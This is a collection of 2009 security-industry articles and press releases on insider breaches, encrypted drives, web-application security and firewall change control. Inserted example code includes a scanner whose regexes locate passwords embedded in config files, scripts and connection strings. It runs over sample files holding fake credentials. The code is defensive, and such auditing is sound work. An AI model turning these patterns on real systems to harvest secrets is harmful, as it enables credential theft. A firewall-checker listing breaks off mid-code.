Five Best Practices for Mitigating Insider Breaches

Adam Bosnian, VP Marketing Cyber-Ark Software

Mismanagement of processes involving privileged access, privileged data, or privileged users poses serious risks to organisations. Such mismanagement is also increasing enterprises’ vulnerability to internal threats that can be caused by simple human error or malicious deeds.

According to a recent Computing Technology Industry Association (CompTIA) survey (see http://www.comptia.org/pressroom/get_pr.aspx?prid=1410), although most respondents still consider viruses and malware the top security threat, more than half (53 percent) attributed their data breaches to human error, presenting another dimension to the rising concern about insider threats. It should serve as a wake-up call to many organisations that inadvertent or malicious insider activity can create a security risk.

For instance, take the recent data breach that impacted the Metro Nashville Public Schools. In this case, a contractor unintentionally placed the personal information of more than 18,000 students and 6,000 parents on an unsecured Web server that was searchable via the Internet. Although this act was largely chalked up to human error and has since been corrected, anyone accessing the information when it was freely available online could create a data breach that could cause significant harm to these students and parents.

Moreover, the Identity Theft Resource Center (ITRC) recently reported that insider theft incidents more than doubled between 2007 and 2008, accounting for more than 15 percent of data breaches. According to the report, human error breaches, as well as those related to data-in-motion and accidental exposure, accounted for 35 percent of all data breaches reported, even after factoring in that the number of breaches declined slightly during this period.

To significantly cut the risk of these insider breaches, enterprises must have appropriate systems and processes in place to avoid or reduce human errors caused by inadvertent data leakage, sharing of passwords, and other seemingly harmless actions. 

One approach to address these challenges is digital vault technology, which is especially valuable for users with high levels of enterprise/network access as well as those handling sensitive information and/or business processes such as users with privileged access -- including third-party vendors or consultants, executive-level personnel -- or access to the core applications running within an organisation’s critical infrastructure.

Instead of trying to protect every facet of an enterprise network, digital vault technology creates safe havens -- distinct areas for storing, protecting, and sharing the most critical business information -- and provides a detailed audit trail for all activity associated within these safe havens. This encourages more secure employee behavior and significantly reduces the risk of human error.

Here are some best practices for organisations serious about preventing internal breaches, be they accidental or malicious, of any processes that involve privileged access, privileged data, or privileged users.

Best Practice #1: Establish a Safe Harbor

By establishing a safe harbor or vault for highly sensitive data (such as administrator account passwords, HR files, or intellectual property), build security directly into the business process, independent of the existing network infrastructure. This will protect the data from the security threats of hackers and the accidental misuse by employees.

A digital vault is set up as a dedicated, hardened server that provides a single data access channel with only one way in and one way out. It is protected with multiple layers of integrated security including a firewall, VPN, authentication, access control, and full encryption. By separating the server interfaces from the storage engine, many of the security risks associated with widespread connectivity are removed.

Best Practice #2: Automate Privileged Identities and Activities

Ensure that administrative and application identities and passwords are changed regularly, highly guarded from unauthorised use, and closely monitored, including full activity capture and recording. Monitor and report actual adherence to the defined policies. This is a critical component in safeguarding organizations and helps to simplify audit and compliance requirements, as companies are able to answer questions associated with “who” has access and “what” is being accessed. 

As listed among the Consensus Audit Guidelines’ 20 critical security controls, the automated and continuous control of administrative privileges is essential to protecting against future breaches. [Editor’s note: the guidelines are available at http://www.sans.org/cag/.]

Best Practice #3: Identify All Your Privileged Accounts

The best way to start managing privileged accounts is to create a checklist of operating systems, databases, appliances, routers, servers, directories, and applications throughout the enterprise. Each target system typically has between one and five privileged accounts. Add them up and determine which area poses the greatest risk. With this data in hand, organisations can easily create a plan to secure, manage, automatically change, and log all privileged passwords.

Best Practice #4: Secure Embedded Application Accounts

Up to 80 percent of system breaches are caused by internal users, including privileged administrators and power users, who accidentally or deliberately damage IT systems or release confidential data assets, according to a recent Cyber-Ark survey.

Many times, the accounts leveraged by these users are the application identities embedded within scripts, configuration files, or an application. The identities are used to log into a target database or system and are often overlooked within a traditional security review. Even if located, the account identities are difficult to monitor and log because they appear to a monitoring system as if the application (not the person using the account) is logging in.

These privileged, application identities are being increasingly scrutinized by internal and external auditors, especially during PCI- and SOX-driven audits, and are becoming one of the key reasons that many organizations fail compliance audits. Therefore, organisations must have effective control of all privileged identities, including application identities, to ensure compliance with audit and regulatory requirements.
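Best Practice #3 asks for an inventory of privileged accounts per target system, and Best Practice #4 warns that the accounts easiest to miss are the application identities embedded in scripts and configuration files. The following script, an added example rather than Cyber-Ark's own tooling, scans a set of constructed sample files for the three most common embedding styles (key/value properties, a command-line password switch, and a connection string), records each account against the system it logs into without storing the secret itself, and rolls the findings up into the per-target inventory the checklist calls for. The file contents, hostnames, account names and the list of "privileged by convention" names are all assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample files (not from any real system). Each shows one common
# place an application identity hides: a properties file, a shell script and
# a web.config connection string. The README is a negative control.
SAMPLE_FILES = {
    "/opt/app/conf/db.properties": (
        "db.url=jdbc:oracle:thin:@dbhost:1521/orcl\n"
        "db.user=APPADMIN\n"
        "db.password=Sup3rS3cret!\n"
    ),
    "/opt/app/bin/backup.sh": (
        "#!/bin/sh\n"
        "mysqldump -u root -pRootPw123 prod > /backup/prod.sql\n"
    ),
    "/inetpub/app/web.config": (
        "<connectionStrings>\n"
        '  <add name="main" connectionString="Server=sqlhost;User Id=sa;Password=sa2009;" />\n'
        "</connectionStrings>\n"
    ),
    "/opt/app/README": "No credentials in here.\n",
}

# Assumed patterns for the three styles of embedded credential shown above.
KV_USER = re.compile(r"(?im)^\s*[\w.-]*(?:user(?:name)?|uid|login)\s*=\s*(\S+)\s*$")
KV_PASS = re.compile(r"(?im)^\s*[\w.-]*(?:password|passwd|pwd)\s*=\s*(\S+)\s*$")
CLI_MYSQL = re.compile(r"-u\s*(\S+)\s+-p(\S+)")
CONN_STR = re.compile(r"(?i)User Id=([^;]+);\s*Password=([^;]+)")
TARGET_HOST = re.compile(r"(?i)(?:Server=([^;]+)|@([\w.-]+)[:/])")

# Account names treated as privileged by convention (assumed list).
PRIVILEGED = re.compile(r"(?i)^(root|sa|sys|system|administrator|.*admin.*)$")


def guess_target(text):
    """Pull the host the credential logs into out of the same file, if present."""
    m = TARGET_HOST.search(text)
    return (m.group(1) or m.group(2)) if m else "localhost"


def scan_file(path, text):
    """Return one finding per account found with a secret next to it.
    The secret itself is never stored in the finding, only its length."""
    target = guess_target(text)
    found = []

    def add(account, secret):
        found.append({
            "path": path,
            "target": target,
            "account": account,
            "secret_len": len(secret),
            "privileged": bool(PRIVILEGED.match(account)),
        })

    users, passwords = KV_USER.findall(text), KV_PASS.findall(text)
    if users and passwords:            # key/value style: pair the first of each
        add(users[0], passwords[0])
    for user, secret in CLI_MYSQL.findall(text):
        add(user, secret)
    for user, secret in CONN_STR.findall(text):
        add(user, secret)
    return found


def scan_all(files):
    return [f for path, text in files.items() for f in scan_file(path, text)]


def inventory(findings):
    """Best Practice #3: accounts per target system, ready to be added up."""
    by_target = defaultdict(set)
    for f in findings:
        by_target[f["target"]].add(f["account"])
    return {t: sorted(a) for t, a in sorted(by_target.items())}


def report(files):
    """Print a secret-free summary and return the raw findings."""
    findings = scan_all(files)
    for f in findings:
        flag = "PRIVILEGED" if f["privileged"] else "standard"
        print(f'{f["path"]}: {f["account"]}@{f["target"]} ({flag}, {f["secret_len"]}-char secret)')
    print("inventory:", inventory(findings))
    return findings


if __name__ == "__main__":
    report(SAMPLE_FILES)
```

Running it against a real file tree would mean walking the filesystem instead of the embedded dictionary; the output is deliberately free of the secrets themselves, so the report can be handed to an auditor without becoming another copy of the passwords it found.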

Best Practice #5: Avoid Bad Habits

To better protect against breaches, organisations must establish best practices for securely exchanging privileged information. For instance, employees must avoid bad habits (such as sending sensitive or highly confidential information via e-mail or writing down privileged passwords on sticky notes). IT managers must also ensure they educate employees about the need to create and set secure passwords for their computers instead of using sequential password combinations or their first names.

The lesson here is that the risk of internal data misuse and accidental leakage can be significantly mitigated by implementing effective policies and technologies. In doing so, organizations can better manage, control, and monitor the power they provide to their employees and systems and avoid the negative economic and reputational impacts caused by an insider data breach, regardless of whether it was done maliciously or by human error.

www.cyber-ark.com

- - -

Adam Bosnian is the vice president of products and strategy at Cyber-Ark Software (http://www.cyber-ark.com/). He is responsible for the global product and business strategy of the company as well as for managing the North American sales organization and growing the business in this area.

<>

Encryption is the equivalent of a seat belt for data

By Andy Cordial, Managing Director at Origin Storage

The first thing most of us do when we get into a car is put on a seatbelt, whether we’re driving or just along for the ride – it’s so important that it’s the law in the UK. We don’t plan to have an accident but, just in case we do, we’re protected. So why don’t we give our data the same courtesy?

The quantity of electronic data relied upon by both the private and public sectors is increasing at a rapid rate. Before we go further, let’s clarify what is meant by data: anything stored electronically. There are the usual documents, email and databases, but another growth area is surveillance monitoring, and the resulting video, audio and data streams all contribute to these data banks, which need to be stored and managed carefully.

The ability to carry data when we’re going about our daily business, whether on portable hard drives, laptops, or USB sticks, etc., has inarguably revolutionised working practices. No longer constrained by the physical boundaries of the office, people are free to work just about anywhere - at home, in the pub, on the train or in the air, at a client’s premises, even McDonalds offers wi-fi access. However, there has been a price to pay. News reports on data leakage have become a regular feature and cause huge embarrassment to organisations, impacting their image and damaging the relationship with customers. So why is the lesson taking so long to learn?

Many organisations have turned to encryption as a saving grace without fully understanding the problem they face, and as a result have fallen foul of it. There are a number of software-based solutions at entry level; however, it is proven that they can be bypassed relatively easily. A case in point is that of PA Consulting: a single employee was in breach of its well-established information security processes when allowed to bypass the encryption software that would have protected the personal data of 84,000 prisoners in England and Wales when it was transferred to a memory stick, which subsequently went missing. PA Consulting lost its £1.5 million contract and jeopardised its remaining £8 million of Government contracts.

Instead of relying on users to encrypt data before transferring it to a portable device, isn’t it better for the external device to have encryption already built in? External hard drives are available that utilise a hardware based encryption chip to seamlessly encrypt and decrypt data using military grade AES / CBC mode encryption.

Like any product, there are variants, so it’s important to identify what matters when evaluating the various offerings. Key things to look for are:

1. If users, for example, are likely to be walking away and returning when using a device, but not wishing to log out every time, it may be considered important to have a quick disconnect feature via the LCD panel so that the external drive disappears from the user’s screen and cannot be accessed until the correct PIN is entered.

2. Another concern is that the keypad may involuntarily disclose the PIN – either due to marks on the keypad or from shoulder surfing – so a random display facility may be considered essential.

3. A further consideration is what happens if an incorrect PIN is used. If entering an incorrect code carries no penalty, then perseverance could be rewarded and the data breached. It may be deemed important that after a predetermined number of failed attempts the data is destroyed so that it cannot be recovered.

4. Plugged in via a USB cable, users are presented with a familiar LCD panel on the device itself to enter an up-to-18-digit PIN; without that code the data is inaccessible.

5. Of significant importance may be the need for regular password changes. The firmware should have the facility to be customised to present the user with a message that makes sure that the password is regularly changed and/or registered within the IT department.

6. Unlike software-based encryption, this solution is not vulnerable to the same hacking programs, decryption software and key loggers which plague other products on the market and make their use unsafe.
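The first three considerations in the list above (quick disconnect, a randomised keypad, and destroying the data after too many wrong PINs) are really one small state machine inside the drive's firmware. The model below is an added illustration of that logic, not Origin Storage's firmware or any real product's code: it keeps the data-encryption key only in a form wrapped under a key derived from the PIN, counts failed unlocks, and at the limit overwrites the wrapped key, after which even the correct PIN recovers nothing. The PBKDF2 work factor, the 4-digit minimum, the XOR wrapping and the ten-attempt default are assumptions made for the example; a real device would use a hardware cipher and tamper-resistant storage for the same purpose.

```python
import hashlib
import hmac
import os
import secrets

PBKDF2_ROUNDS = 100_000   # assumed work factor for turning the PIN into a key
MAX_PIN_DIGITS = 18       # the up-to-18-digit PIN mentioned above


class EncryptedDriveModel:
    """Model of the PIN/retry/wipe logic of a hardware-encrypted drive.

    The data-encryption key (DEK) is stored only in wrapped form; the PIN
    derives the wrapping key. Wiping the wrapped DEK makes the data
    unrecoverable without having to touch the (much larger) ciphertext.
    """

    def __init__(self, pin, max_attempts=10):
        if not (4 <= len(pin) <= MAX_PIN_DIGITS and pin.isdigit()):
            raise ValueError("PIN must be 4 to 18 digits")
        self.max_attempts = max_attempts
        self.failed_attempts = 0
        self.unlocked = False
        self.wiped = False
        self._salt = os.urandom(16)
        dek = secrets.token_bytes(32)
        self._wrapped_dek = self._xor(dek, self._kek(pin))
        self._dek_check = hashlib.sha256(dek).digest()  # lets unlock() tell right from wrong
        self._dek = None                                  # only held while unlocked

    def _kek(self, pin):
        return hashlib.pbkdf2_hmac("sha256", pin.encode(), self._salt, PBKDF2_ROUNDS, 32)

    @staticmethod
    def _xor(a, b):
        return bytes(x ^ y for x, y in zip(a, b))

    def unlock(self, pin):
        """Consideration 3: count failures and destroy the key at the limit."""
        if self.wiped:
            return False
        candidate = self._xor(self._wrapped_dek, self._kek(pin))
        if hmac.compare_digest(hashlib.sha256(candidate).digest(), self._dek_check):
            self._dek, self.unlocked, self.failed_attempts = candidate, True, 0
            return True
        self.failed_attempts += 1
        if self.failed_attempts >= self.max_attempts:
            self._wipe()
        return False

    def _wipe(self):
        """Overwrite the wrapped key and its check value; the data is now gone."""
        self._wrapped_dek = bytes(len(self._wrapped_dek))
        self._dek_check = bytes(len(self._dek_check))
        self._dek = None
        self.unlocked = False
        self.wiped = True

    def quick_disconnect(self):
        """Consideration 1: drop the key so the drive vanishes until re-entry."""
        self._dek = None
        self.unlocked = False

    def data_key(self):
        """What the cipher engine would use; refused while locked."""
        if not self.unlocked:
            raise PermissionError("drive is locked")
        return self._dek

    @staticmethod
    def shuffled_keypad():
        """Consideration 2: a randomised digit layout defeats wear marks."""
        digits = list("0123456789")
        secrets.SystemRandom().shuffle(digits)
        return "".join(digits)


if __name__ == "__main__":
    drive = EncryptedDriveModel("123456", max_attempts=3)
    print("keypad layout:", drive.shuffled_keypad())
    print("correct PIN:", drive.unlock("123456"))
    drive.quick_disconnect()
    for _ in range(3):
        print("wrong PIN:", drive.unlock("000000"), "failed:", drive.failed_attempts)
    print("wiped:", drive.wiped, "correct PIN after wipe:", drive.unlock("123456"))
```

The check value is a hash of the key rather than of the PIN, so a captured copy of the device state gives an attacker nothing to test PIN guesses against except the slow PBKDF2 derivation, and the retry counter is what actually bounds the number of guesses.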

The ability to work whenever and wherever we want has significant benefits, especially in today’s 24/7 culture, so it is only fair that when data is involved it is done so responsibly and securely. Since 1965 it has been compulsory for cars in the UK to be manufactured with seat belts, although it took 18 years before it became compulsory for them to be used in the front of vehicles and a further eight in the rear – how many preventable deaths resulted in this intervening time? Now you could argue that no-one would die from unsecured data, but individuals could be affected in the event of an accident resulting in a breach, and in fact have – TV presenter Jeremy Clarkson inadvertently proved what can be done with limited personal information in the wrong hands when he lost money after publishing his bank details in a newspaper in January 2008 (1)!

We will not have long to wait before we see notebooks coming to the market that have encryption built in to the hard drive. A marriage of technologies, the SED (self-encrypting disk) follows the Opal standard established by the Trusted Computing Group. One example is the new range of laptop drives that will be completely encrypted and will sit internally in its notebooks. To the user the encryption is seamless, requiring only an additional password at login, and therefore it is impossible to bypass.

I find it difficult to understand how anyone can justify carrying electronic data unsecured in the public domain. People need to be educated as to the many different options available however, in my opinion, transparent encryption of not just sensitive but all portable data reduces the risk of the individual either forgetting, or worse bypassing, this safety belt. The next time you decide to carry data out of the safe confines of the corporate environment, remember to buckle it up.

Origin Storage is exhibiting at Storage Expo, 14th – 15th October, Olympia, London www.storage-expo.com. The UK’s definitive event for data storage, information and content management provides the opportunity to compare the most comprehensive range of solutions and services from leading suppliers with a free and unrivalled education programme.

<>

1 http://news.bbc.co.uk/1/hi/entertainment/7174760.stm

Scientific company discusses simultaneously protecting applications and data

Simultaneously protecting applications and data: The next evolution in security?

September 2009 (Eskenzi PR) – In a recent Imperva podcast interview, Chad Lorenc of Agilent Technologies explained how to create a highly secure communications infrastructure in order to collaborate securely with its outsourcing partners. The key element: the synergies between database and application protection within a single, unified view.

Lorenc, information security network and application security architect with the IT design and measurement specialist - and a customer of Imperva's - talked about the popular issue of application security and how his company, while outsourcing a number of its IT services, maintains the highest possible levels of security on its network.

Because Agilent carries out a lot of outsourcing of its IT functions, the company has created a highly secure communications infrastructure. Web applications are accessed internally and externally – thus, they needed to secure data from insiders and outsiders. “Because Agilent is so highly outsourced, Web application security is critical—but it is joined at the hip with data,” explained Lorenc.

Agilent's strategy, says Lorenc, is to use a three-tier IT security structure, with the firm's external DMZ (demilitarised zone) interfacing securely with its own core IT resources.

Their approach of using application monitoring and security was made much easier because they had created an advanced environment with many unique places to put in chokepoints, monitor data, block data and do database monitoring. Imperva’s web application firewall gives visibility into how users interact with their assets. This information is used to help guide and validate their application security policy.

From a data protection standpoint, discovery was an important phase to understand what assets they have, and what risks are associated with those assets. Imperva found and classified all their valuable assets so they knew what to protect.

The problem is made all the more complex, said Lorenc, by the fact that the company's data is effectively residing in as many as 10 or 12 locations.

In the three-tier security structure, therefore, the core IT resources are interfaced securely with the DMZ, and then on to 'true' external IP network-connected systems.

This effectively makes the DMZ a secure virtual cloud environment for which Agilent has to ensure the maximum possible security while maintaining effective communications with its partners.

Lorenc describes this approach as very challenging and requiring the use of a discovery model to ensure best security across multiple platforms - including PHP, Ajax, Java and Microsoft .NET.

"Agilent has encountered a unique set of security challenges as a result of its unusual three-tier security architecture, but has fully met this challenge using conventional IT security technologies, bonded together to create a customised solution," said Brian Contos.

"By linking its Web application firewall technology with a disparate range of other security systems, Agilent has created a unique and highly secure hybrid VPN environment that performs smoothly, despite its complexities," he added.

Join Imperva and Agilent for this educational and entertaining podcast here... http://preview.tinyurl.com/nxdwwn

For more on Imperva: http://www.imperva.com

Agilent Technologies Inc. (NYSE: A) is the world's premier measurement company and a technology leader in communications, electronics, life sciences and chemical analysis. The company's 18,000 employees serve customers in more than 110 countries. Agilent had net revenues of $5.8 billion in fiscal 2008. Information about Agilent is available on the Web at www.agilent.com.

Imperva, the Data Security leader, enables a complete security lifecycle for business databases and the applications that use them. Over 4,500 of the world’s leading enterprises, government organizations, and managed service providers rely on Imperva to prevent sensitive data theft, protect against data breaches, secure applications, and ensure data confidentiality. The award-winning Imperva SecureSphere is the only solution that delivers full activity monitoring from the database to the accountable application user and is recognized for its overall ease of management and deployment. For more information, visit www.imperva.com.

<>

UK firms need to tighten up on Web app security

Imperva says UK firms need to tighten up on Web app security

September 2009 (Eskenzi PR) – News that more than a quarter of all Web applications have a high risk of security vulnerabilities comes as no surprise, nor is the fact that the problem is getting worse, says Imperva, the data security specialist.

"The 2009 Web Application Security Report from NTA Monitor shows that the number of apps with at least one high risk vulnerability has soared from 17 to 27 per cent in the last year, whilst the medium risk category has risen from 78 to 90 per cent," said Brian Contos, Imperva's chief risk strategist.

"Although this comes as no surprise to us, it is an appalling indictment on the software audit and control operations in most companies. With NTA spotting an average of 13 vulnerabilities per test, it's clear that IT departments really do need to pull their socks up in terms of testing and auditing of their software development processes," he added.

According to Contos, NTA Monitor's report proves what Imperva has been telling its clients for some time - namely that few organisations have the in-house resources to perform regular software testing and to maintain a clearly stated set of application security policies.

Perhaps worse, he said, even fewer companies do as NTA Monitor suggests and include security service level agreements into their contracts with Internet or managed service providers.

Staff training, he explained, is central to application auditing and testing, and, since few organisations have the time or skills required, the key to the problem is effective outsourcing.

This is why, Contos noted, Imperva's activity monitoring, real-time protection and risk management of critical business data and applications is now used by more than 4,500 organisations in over 100 countries.

For more on NTA Monitor's report: http://preview.tinyurl.com/mmr69h

For more on Imperva: http://www.imperva.com

<>

Storage Expo - free advice on cloud issues from Google

(Storage PR) Storage Expo, the definitive data storage, information and content management event, is pleased to announce it will be hosting Mr Xen Lategan, technical lead for Google's UK, Ireland and Benelux operations, who will be giving a keynote address at the event.

Mr Lategan, who was a software architect with Accenture, founder of Navigator Computers and a senior technical specialist with Microsoft before joining Google, will be giving the keynote address on day two of Storage Expo, which takes place at London Olympia on October 14/15 this year.

The theme of the Google expert will be this year's hot topic of cloud computing, with which Mr Lategan is very familiar, having specialised in cloud and software-as-a-service (SaaS) technologies for several years.

According to Natalie Booth, Event Manager of Storage Expo, with several major IT players, including Computer Associates, Novell and Unisys having announced plans for secure cloud services for companies in recent weeks, the topic of cloud computing is set to become even hotter on boardroom agendas in the months ahead.

"The advantages of cloud and SaaS technologies are now very clear - lower operating costs for most firms and access to company data on a near-anywhere, anytime basis - making for improved business efficiencies and, of course, an enhanced bottom line," she said.

"Most organisations, however, are relatively poorly equipped to handle the logistics - as well as the security implications - of migrating to a cloud/SaaS architecture, so we're pleased that Mr Lategan, with his considerable experience in the area, will be giving the keynote," she added.

According to Booth, plans call for Mr Lategan to explain why cloud values are critical to all businesses, especially in the current economic environment.

Mr Lategan will also be looking at how cloud computing can help you find, share and secure your company information.

This year's Storage Expo has a comprehensive range of free advice, keynotes and seminars, all designed to ensure that organisations of all sizes can now get the advice they need free of charge.

Alongside key presentations from Amazon and Google, there will be an up-to-the-minute virtualisation showcase, as well as cloud and information & content management zones, channel and launch areas, interactive workshops and several roundtable sessions, including:

Andrew Reichman, Senior Analyst, Forrester will lead the keynote on optimising storage through the downturn: delivering first class storage on a third class ticket. Carla Arend, Program Manager, European Infrastructure Software, IDC Group will lead the panel on future directions that will shape your storage strategies for tomorrow.

Tony Lock, Programme Director, Freeform Dynamics will advise on what to look for when buying a virtualisation solution and find out the top 5 tips for aligning business and IT objectives with ESG’s Managing Director Steve O’Donnell.

Rene Millman, Senior Research Analyst, Gartner Research will expose the truth and hype about cloud and Nigel Stanley, Practice Leader, Bloor Research will chair a panel on is your backup and archive effective.

John Abbot, Founder and Chief Analyst at The 451 Group will discuss Disaster Recovery and the changes server virtualisation will bring, and Jon Collins, CEO & Managing Director, Freeform Dynamics will lead the practitioner panel: how to manage your IT director.

This year we have changed the seminar programme with 2 key themes: “It all starts with Storage” and “Don't just store it, do more with it.”

The “It all starts with Storage” stream will demonstrate optimisation of assets, reduction of cost, storage as an enabler, how to store unstructured data and creating a business case for storage. Key areas that will be covered include Virtualization, Thin Provisioning, SAAS/Cloud, De-duplication, Storage Infrastructure and Networks, Storage Architecture/SAN, Storage as a Platform, SSD's & Flash, IP Storage/FCoE and Data Centres.

The “Don't just store it” stream will include focus sessions on business intelligence, successful information management, and managing unstructured data. Key technologies will include: Enterprise Applications, Information Infrastructure, Sharepoint, BC/DR/Backup, Retrieval/Search, Security, Archiving/Email, Classification/DR, File Sharing/Collaboration, Data Warehousing/Mining and Content and Records management.

As limited bank lending constrains the recovery that everyone is waiting for, all it takes is a day out of the office and any manager interested in enhancing their IT knowledge can learn how to do so expediently and cost-effectively.

And the even better news is that, unlike similar events, all of the exhibitions, including seminars and educational programmes, are free to attend.

This will, said Booth, make even your CFO smile.

"The Q&A sessions are the jewel in the crown for exhibition attendees. As well as getting some of the best advice from key industry figures, you'll also have the chance to quiz them on your own specific circumstances. And all for free," she said.

"If that doesn't warrant a day of your time out of the office, just ask your CFO how much this type of impartial IT advice can cost your organisation. Then register for the free event at http://www.storage-expo.com," she added.

<>

DeviceLock hosts webinar on securing businesses against mobile data leaks - Tuesday, 22nd September at 3pm

SECURE YOUR BUSINESS AGAINST MOBILE DATA LEAKS WITH ENHANCED DEVICE CONTROL ON CORPORATE ENDPOINTS

A DeviceLock Webinar hosted by Infosecurity Magazine

London, UK – September 16, 2009 – DeviceLock, a worldwide leader in endpoint device control and context-aware data leak prevention software solutions, today announced it will be holding a webinar hosted by Infosecurity Magazine UK on Tuesday, 22nd September at 3pm.

The webinar will address what businesses should do to reduce the threat of data leaks through personal mobile devices like smartphones and PDAs. A leading IT security analyst will participate in the webinar, moderated by Infosecurity Magazine’s Technical Editor Steve Gold. The world of end point security is changing rapidly. The proliferation of high-end consumer technology such as PDAs, MP3 players and smartphones has driven increasing adoption of consumer technology in the corporate environment. Microsoft is re-energising its Windows Mobile operating system, while the range of Apple iPhone apps is soaring, as enterprise-grade software developers get to grips with the highly flexible iPhone operating system that Apple has created. Add in the myriad security issues caused by portable storage devices such as iPods plus semi-intelligent USB sticks and it's clear that the world of enforcing policies and rules on end point security is changing very quickly indeed.

It's against this backdrop that Infosecurity has teamed up with DeviceLock, one of the leading end point security specialists, to offer a webinar that will bring the audience up to speed on the threats and challenges that the rapidly evolving mobile IT world engenders.

This webinar will:

  • Give attendees a thorough insight into the anatomy of mobile data leaks and how the problem can be countered.
  • Detail the solutions to these security threats.
  • Help you understand the multiple topologies involved, and how an external mobile threat can also become an internal one.
  • Offer you specific advice - via an interactive Q&A session - on the end point security issues that affect your organisation.

Alexei Lesnykh, Business Development Manager with DeviceLock, will discuss how mobile data leaks through employee smartphones may originate from corporate endpoint computers over local connections that completely bypass the corporate network and cannot be prevented by any network-resident security solutions. The presentation will explain how DeviceLock software helps organizations mitigate these threats through the use of a patent-pending local synchronization control technology.

To register for the webinar go to: http://www.infosecurity-magazine.com/webinar/70/end-point-security-is-changing-can-you-cope/

Following the webinar, DeviceLock will be running a series of technical demonstrations of its award-winning DeviceLock endpoint security software. For more information see www.devicelock.com

Since its inception in 1996 as SmartLine, DeviceLock, Inc. has been providing endpoint device control software solutions to businesses of all sizes and industries. Protecting 4 million computers in over 60,000 organizations worldwide, DeviceLock has a vast range of corporate customers including financial institutions, state and federal government agencies, classified military networks, healthcare providers, telecommunications companies, and educational institutions. DeviceLock, Inc. is an international organization with offices in San Ramon (California, US), London (UK), Ratingen (Germany), Moscow (Russia) and Milan (Italy).

Aspectus PR

<>

Bye Bye Baby

Calum Macleod, Regional Director Tufin Technologies

So the day is finally arriving. Our “baby” is getting married, the culmination of two years in which we’ve seen him go through a different girl every week – or rather they went through him! – some of whom met with his mother’s approval and most of whom did not, until finally he came home with the one who most definitely did not! Only to discover that after two years he’s marrying a blond version of his mother, so she now has total approval!

And the last few weeks have been the usual nightmare of organization. Family arriving from all ends of the earth, all looking – like most Scots – for low cost (read “can we sleep on your floor – there’s only 25 of us”) accommodation. Trying to organize services, receptions, invitations etc., and through it all the groom is blissfully ignorant. In fact he just announced three days before the wedding that there’s a football game the night before the wedding which he’s planning to go to. Knowing his mother and his future wife, I think I’ve convinced him that this may not be the smartest move, for his own health!

But like most “users”, he is blissfully ignorant of what the simple statement “I’m getting married” means. A bit like the user who tells the IT department, “I just need access to a certain application.”

The simple request from a user can frequently create a nightmare for most security departments, especially when it means changing firewall configurations!

I mean where do you start? Before you even consider what needs changing you need to go through a process to confirm that a user is authorized to access the system; that somebody has approved the request; that the request complies with organizational policy; that the requested service is not already available. Almost daily I receive requests asking for connection to systems that already exist.

And it goes on. What impact will the change have on other services; how long should the service be available; where should access be allowed from. And once we’ve gone through all these considerations, somebody has to sit down and actually figure out the fine print. Like the wedding, some bright spark decided an order of service was necessary and who better to do this than the “computer expert”. So with poems and songs and liturgy coming from all sources, and in all formats, it’s been yours truly’s job to figure it out. And did I get it right first time? Oh no – it takes days to get it just right!

And this is frequently the nightmare for many firewall administrators. Converting a request into an actual change is not only time consuming, it very often has to be redone because the first attempt turns out to be wrong. Recently an acquaintance who is a firewall admin was having a crisis after he changed something on the firewalls at the weekend which caused a system to crash. He couldn’t make our lunch appointment because he wasn’t in his boss’s good books, apparently, so he was focusing on solving the problem – i.e. keeping his job! You might think that he could just reverse the change and that would be it, but it’s never that simple. Tracking changes is one of the biggest challenges for firewall admins!

The lack of automation and operational efficiency tools means administrators spend most of their time on repetitive, manual tasks in an attempt to enforce corporate policies across many distributed infrastructure components. Security managers need to give their staff the tools to automate the repetitive parts of the security lifecycle, so that less time goes on routine work and resources can be invested more effectively. With automation, many manual analysis and auditing operations can be cut from days to a matter of hours.

Recently Swisscom IT Service implemented an automated policy management solution and, according to Swisscom, now has “an unprecedented amount of visibility and control over firewall operations.” The automation gave them an overall snapshot of the state of their firewalls that enables them to operate in a much more agile, proactive and strategic manner. According to Swisscom, “We accomplish more in less time, with full confidence that we are operating in a secure, compliant fashion.”

Companies need to understand the business impact of network security and to demand a high level of transparency and accountability. At the same time, they are facing the need to comply with a variety of government, industry and regulatory security standards. As a result, companies are developing ever-more detailed and complicated security policies. Implementing them on the ground, over thousands of infrastructure components, is a time-consuming and error-prone process, especially when they continue to rely on outdated manual processes and do not use the automation tools that exist.

To ensure that corporate security policies are implemented accurately and consistently, companies need to employ process automation to manage changes to security infrastructure. More than any manual process, change automation can ensure separation of duties and accountability.

Every change to security infrastructure involves risk. As enterprise networks grow and become more complex, organizations struggle to ensure that routine security administration does not accidentally result in downtime or even business-level disruptions.

Organizations need automated risk analysis procedures that proactively examine every change request in the context of both organizational security policy and the current implementation on the ground. There’s no point in having policies that are not enforced there. My car has a handbook that advises me to get it serviced every so often, but if I don’t then the consequences are clear!

According to Greg Young from Gartner "Compliance and complexity are driving the requirement for better capability in optimizing the existing firewall rules base, and examining the impact of any proposed rule changes." And experts will tell you that poorly configured firewalls remain a significant risk for many organizations. It’s not the technology that’s at fault, but rather the configuration and change control processes that are neglected or missing altogether. Best practice suggests you should test and review your firewall configuration regularly, but many organizations fail to do this.
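The risk analysis described above, as an added example: a small pre-change checker that takes a requested allow rule and reports policy breaches (a missing approval ticket, an any/any rule, inbound Internet access to internal address space, cleartext admin protocols) and whether the requested access already exists in the rule base, the case mentioned earlier of requests for connections that are already there. This is example code written for this column, not Tufin’s product or code; the policy, the rule base and the four requests are constructed, and the rule model (ordered first-match rules over IPv4 prefixes and a single TCP/UDP destination port range) is a deliberate simplification of any real firewall.

```python
"""Pre-change review of a firewall rule request: policy checks plus a
redundancy check against the current rule base.

Added example for this column; not Tufin's product or code. The policy,
the rule base and the requests are constructed, and the rule model
(ordered first-match rules over IPv4 prefixes and one TCP/UDP destination
port range) is a simplification of any real firewall.
"""
from dataclasses import dataclass
from ipaddress import IPv4Network, ip_network
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Rule:
    name: str
    src: IPv4Network
    dst: IPv4Network
    proto: str    # "tcp" or "udp"
    ports: range  # destination ports; rule() builds this from an inclusive lo..hi
    action: str   # "allow" or "deny"


def rule(name: str, src: str, dst: str, proto: str, lo: int, hi: int, action: str) -> Rule:
    """Build a Rule from CIDR strings and an inclusive destination port range."""
    return Rule(name, ip_network(src), ip_network(dst), proto, range(lo, hi + 1), action)


# Constructed rule base, evaluated top-down, first match wins.
RULEBASE: List[Rule] = [
    rule("web-in",    "0.0.0.0/0",   "203.0.113.10/32", "tcp", 443, 443,   "allow"),
    rule("dns-out",   "10.0.0.0/8",  "0.0.0.0/0",       "udp", 53,  53,    "allow"),
    rule("admin-ssh", "10.1.1.0/24", "10.2.0.0/16",     "tcp", 22,  22,    "allow"),
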